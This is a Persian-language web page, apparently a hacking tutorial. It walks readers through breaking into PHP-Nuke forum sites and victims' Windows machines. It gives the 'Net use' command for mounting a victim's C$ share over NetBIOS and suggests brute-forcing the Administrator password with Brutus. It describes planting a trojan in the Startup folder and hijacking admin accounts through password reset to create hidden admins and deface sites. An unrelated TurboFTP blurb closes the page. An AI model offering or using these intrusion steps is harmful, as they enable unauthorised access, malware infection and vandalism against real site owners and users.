اول باید خصوصیات سایت را بررسی کنید و اولین خوصوصیات ضروری پی اچ پی نوک بودن آن هست! به روش های مختلف هک کردنه یوزر ادمین یا ساختن ادمین مخفی را یاد بگیرید.
در هر سایت نوک یک فروم قرار دارد و همینوطور که میدانید در فروم یک یا چند نفر به cp (مخفف کنترل پانل) دسترسی دارند. شاید از همین فکر چیزی فهمیده باشید. پس در هر تالار چندین کاربر (user) وجود دارد (بستگی به کیفیت تالار دارد) و مدیر هم در بین این کاربران هست و نا کاربری او فاحش هست و می توانید آن را به راحتی ببینید.با این توضیح شما دو روش را برای هم حدس زدید. درسته ! می گن هک سایت سخته ولی اونقدرا هم سخت نیست حتی با ماجیک هم میشه سایت هک کرد! پس فعلا با ماجیک هک می کنیم تا برسیم به جاهای پیشرفته! حالا باید به سیستم طرف برای نصب تروجان نفوذ کنید و نت بایوس بهترین راه هست!
نفوذ به سیستم از طریق NetBios
--------------------------------------------------------------------------------
با یاد گیری این مقاله شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... ) .
خب بریم سره موضوع اصلی:
اول باید IP سیستم مورد نظر رو پیدا کنید ( تو سایت قبلا اموزش دادم ) ، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید:
Net use x: \\IP\DriveName$
به جای X میتونید هر حرفی رو بنویسید به غیر از حروفی که اسم درایو های خودتون هست.مثلا اگه درایو G داشته باشید ، از حرف G نمیتونید استفاده کنید. به جای IP هم ای پی مورد نظر رو که می خواهید بهش نفوذ کنید رو بنویسید. به جای DriveName هم اسم درایو رو بنویسید. اگه مثلا میخواهید درایو C رو Share کنید ، حرف c رو بنویسید.یک نمونه از دستور رو ببینید:
Net use x: \\80.191.191.39\c$
اگه کمی شانس داشته باشید بدون در خواست User Name و Password درایو Share میشه و این پیغام رو مینویسه: The command completed successfully اما اگه از شما در خواست یوزر نیم و پسورد کرد به جای یوزر نیم کلمه Administrator رو وارد کنید که برای ویندوز XP و 2000 تعریف شده است ( البته معمولا تو یه خط یوزر نیم رو میده ).پسورد هم میتونید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید.
اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید ) (نویسنده : فرشاد عزیز)
حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....
هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید. قبل از اینکه ورود به کنترل پانل را به شما یاد دهیم بهتر استروش دیگری برای ساخت ادمین مخفی ( hide admin ) یاد بگیریم! اول باید بفهمیم که نوک چیست؟
پی اچ پی نوک انواع مختلفی دارد که از سال ۲۰۰۱ به ورژن های مجانی تبدیل شد و برای همین شهرت زیادی پیدا کرد در ابتدا تیم های آمریکایی و پاکستانی ورزن های ۶.۸ . ۶.۹ را مجانی کردند و ایرانی های عزیز نیز برای هموطننانشان از ورژن ۷.۳ تا ۷.۸ (آخرین نسخه) را ترجمه کردند و نوک های فراسی را بوجود آوردند. مثل گروه معروف IranNuke
این اکسپلویت هم به شما کمک می کند که در کنترل پانل سایت نوک وارد شوید و شناسه ی مدیرتی برای خود بسازید. این اکسپولیت برای نوک ۷.۳ تا ۷.۷ هست و نوک ۷.۸ را فقط اگر روی لکال هاست باشد هک می کند.
در این فیلم های آموزشی شما با نحوه هک کردن ۲ پرتال مختلف آشنا می شوید.
یکی از فیلم ها مربوط به هک کردن پرتال های سری ( SapPHPLesson ) و دیگری مربوط به ( WebWiZ ) می باشد.
این فیلم توسط خودم ( ساسان سیفی ) شده است.
برای دریافت فیلم آموزشی هک کردن پرتال WebWiz بر روی لینک زیر کلیک کنید :
برای دریافت فیلم آموزشی هک کردن پرتال SapPHPLesson بر روی لینک زیر کلیک کنید :
TurboFTP
« نرم افزار کارا و پرقدرت برای FTP »
نرم افزار TurboFTP یکی دیگر از ابزار FTP است، که نسبت به بعضی نرم افزارهای مشابه امکاناتی از قبیل:
- قابلیت Resume
- سرعت بالا در UPLoad بخاطر تکه تکه کردن پکت
- استفاده آسان
- پشتیبانی SFTP روی SSH2 و SSL/TSL
- ابزار پروکسی
- ابزار ZIP
- و ...
